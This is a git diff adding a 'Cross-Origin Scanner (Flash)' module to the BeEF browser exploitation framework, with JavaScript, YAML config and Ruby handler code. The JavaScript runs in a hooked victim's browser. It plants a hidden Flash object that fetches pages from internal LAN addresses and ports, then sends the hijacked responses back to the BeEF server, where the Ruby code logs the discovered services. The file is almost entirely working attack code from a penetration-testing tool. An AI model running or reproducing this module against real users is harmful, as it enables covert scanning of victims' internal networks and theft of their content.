var timer = null; + var frequency = frequency; + var start_scan = (new Date).getTime(); + + this.process = function() { + var item = stack.shift(); + eval(item); + if (stack.length === 0) { + clearInterval(timer); + timer = null; + var interval = (new Date).getTime() - start_scan; + beef.debug("[Cross-Origin Scanner (Flash)] Worker queue is complete ["+interval+" ms]"); + return; + } + } + + this.queue = function(item) { + stack.push(item); + if (timer === null) { + timer = setInterval(this.process, frequency); + } + } + + } + + var init = function(id, port) { + var newObjectTag; + var attr = {}, param = {}; + var url = beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/objects/ContentHijacking.swf'; + attr = {id: 'cross_origin_flash_<%= @command_id %>_'+id+'_'+port, width: 1, height: 1, 'style': 'visibility: hidden', 'type': 'application/x-shockwave-flash', 'AllowScriptAccess': 'always'}; + param = {'AllowScriptAccess': 'always'}; + attr.data = url; + newObjectTag = createHTMLObject(attr,param); + beef.debug("[Cross-Origin Scanner (Flash)] Waiting for the new object..."); + document.body.appendChild(newObjectTag); + }; + + // create and embed Flash object + var createHTMLObject = function(attributes, parameters) { + var i, html, div, obj, attr = attributes || {}, param = parameters || {}; + html = ''; + html += ''; + div = document.createElement('div'); + div.innerHTML = html; + obj = div.firstChild; + div.removeChild(obj); + return obj; + }; + + // fetch a URL with Flash + var get_url = function(proto, host, port, id) { + var objCaller; + var url = 'http://'+host+':'+port+'/'; + beef.debug("[Cross-Origin Scanner (Flash)] Fetching URL: " + url); + objCaller = document.getElementById('cross_origin_flash_<%= @command_id %>_'+id+'_'+port); + try { + objCaller.GETURL('function(data) { '+ + 'var proto = "http";' + + 'var host = "'+host+'";' + + 'var port = "'+port+'";' + + 'var data = unescape(data);' + + 'beef.debug("[Cross-Origin Scanner (Flash)] Received data ["+host+":"+port+"]: " + data);' + + 'if (!data.match("Hijacked Contents:")) return;' + + 'var response = data.replace(/^Hijacked Contents:\\r\\n/);' + + 'var title = "";' + + 'if (response.match("(.*?)<\\/title>")) {' + + ' title = response.match("<title>(.*?)<\\/title>")[1];' + + '}' + + 'beef.debug("proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + + 'beef.net.send("<%= @command_url %>", <%= @command_id %>, "proto="+proto+"&ip="+host+"&port="+port+"&title="+title+"&response="+response);' + + ' }', url); + } catch(e) { + beef.debug("[Cross-Origin Scanner (Flash)] Could not create object: " + e.message); + } + setTimeout('document.body.removeChild(document.getElementById("cross_origin_flash_<%= @command_id %>_'+id+'_'+port+'"));', timeout); + } + + beef.debug("[Cross-Origin Scanner (Flash)] Starting scan ("+(ips.length*ports.length)+" URLs / "+threads+" workers)"); + + // create worker queue + var workers = new Array(); + for (w=0; w < threads; w++) { + workers.push(new WorkerQueue(wait*1000)); + } + + // send Flash request to each IP + var proto = 'http'; + for (var i=0; i < ips.length; i++) { + var worker = workers[i % threads]; + for (var p=0; p < ports.length; p++) { + var host = ips[i]; + var port = ports[p]; + worker.queue("init("+i+", "+port+"); setTimeout(function() {get_url('"+proto+"', '"+host+"', '"+port+"', "+i+");}, 2000)"); + } + } + +}); + diff --git a/modules/network/cross_origin_scanner_flash/config.yaml b/modules/network/cross_origin_scanner_flash/config.yaml new file mode 100644 index 000000000..4dc49c978 --- /dev/null +++ b/modules/network/cross_origin_scanner_flash/config.yaml @@ -0,0 +1,16 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + cross_origin_scanner_flash: + enable: true + category: "Network" + name: "Cross-Origin Scanner (Flash)" + description: "Scan an IP range for web servers which allow cross-origin requests using Flash. The HTTP response is returned to BeEF.<br/><br/>Note: set the IP address range to 'common' to scan a list of common LAN addresses.<br/><br/>This module uses ContentHijacking.swf from <a href='https://github.com/nccgroup/CrossSiteContentHijacking'>CrossSiteContentHijacking</a> by Soroush Dalili (@irsdl)." + authors: ["bcoles", "@irsdl"] + target: + working: ["C", "FF"] + not_working: ["IE", "S", "O"] diff --git a/modules/network/cross_origin_scanner_flash/module.rb b/modules/network/cross_origin_scanner_flash/module.rb new file mode 100644 index 000000000..2f610f63b --- /dev/null +++ b/modules/network/cross_origin_scanner_flash/module.rb @@ -0,0 +1,46 @@ +# +# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Cross_origin_scanner_flash < BeEF::Core::Command + + def pre_send + BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/network/cross_origin_scanner_flash/ContentHijacking.swf','/objects/ContentHijacking','swf') + end + + def post_execute + content = {} + content['result'] = @datastore['result'] + save content + + configuration = BeEF::Core::Configuration.instance + if configuration.get("beef.extension.network.enable") == true + + session_id = @datastore['beefhook'] + + # log the network service + if @datastore['results'] =~ /proto=(.+)&ip=(.+)&port=([\d]+)&title/ + proto = $1 + ip = $2 + port = $3 + type = 'HTTP Server (Flash)' + if BeEF::Filters.is_valid_ip?(ip) + print_debug("Hooked browser found HTTP server #{ip}:#{port}") + BeEF::Core::Models::NetworkService.add(:hooked_browser_id => session_id, :proto => proto, :ip => ip, :port => port, :type => type) + end + end + end + + end + + def self.options + return [ + {'name' => 'ipRange', 'ui_label' => 'Scan IP range (C class)', 'value' => '192.168.0.1-192.168.0.254'}, + {'name' => 'ports', 'ui_label' => 'Ports', 'value' => '80,8080'}, + {'name' => 'threads', 'ui_label' => 'Workers', 'value' => '5'}, + {'name' => 'timeout', 'ui_label' => 'Timeout for each request (s)', 'value' => '10'} + ] + end + +end